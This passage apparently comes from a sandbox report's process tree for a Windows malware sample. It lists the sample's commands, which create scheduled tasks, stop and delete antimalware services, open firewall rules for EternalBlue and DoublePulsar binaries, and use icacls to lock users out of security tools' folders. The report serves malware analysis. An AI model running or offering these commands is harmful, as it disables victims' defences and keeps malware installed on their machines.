C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3268
-
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:7612
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- Scheduled Task/Job: Scheduled Task
PID:2012 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5296
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:7424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:4704
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:1152
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6700
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
PID:7816
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- Kills process with taskkill
PID:2708
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:1560
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
PID:1764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵PID:4664
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵PID:2036
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:2972
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵PID:6488
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵PID:1304
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵PID:116
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵
- System Location Discovery: System Language Discovery
PID:6868 -
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
PID:5916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵PID:4352
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:3260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:3172
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
PID:7708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:7368
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:7732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵PID:7780
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:7520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵PID:7960
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
PID:7240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵PID:7968
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:7912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:2892
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
PID:7888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵PID:7068
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:6624
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵PID:7752
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
PID:5772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:8160
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵PID:2044
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
PID:7836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵PID:1044
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:3552
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
- System Location Discovery: System Language Discovery
PID:3760 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:6004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:2184
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:5164
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3260
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:7644
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:8056
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:7780
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7368
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:6452
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:8112
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:4596
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:7964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:6444
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵PID:6028
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵PID:5968
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵PID:6940
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵PID:2624
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵PID:3496
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵PID:6332
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵PID:3548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6624
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵PID:7528
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵PID:2428
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵PID:6852
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵PID:6296
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:3328
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵PID:7828
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:7352 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵PID:7572
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵PID:7344
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵PID:7544
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵PID:7976
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:8160 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:3096
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:8072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵PID:7360
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵PID:7288
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵PID:7280
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4884 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵PID:4240
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵PID:3320
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:1944
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:8060
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
PID:7416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:6408
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
PID:6044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:5888
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:7800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵PID:8008
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:8016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:1144
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:444 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵PID:5940
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:4720
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:7676 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:7616
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4752 -
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:3068
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:8188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:6136 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:4864
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵PID:2712
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵PID:7380
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵PID:5148
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:5772 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:7180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:7528
-
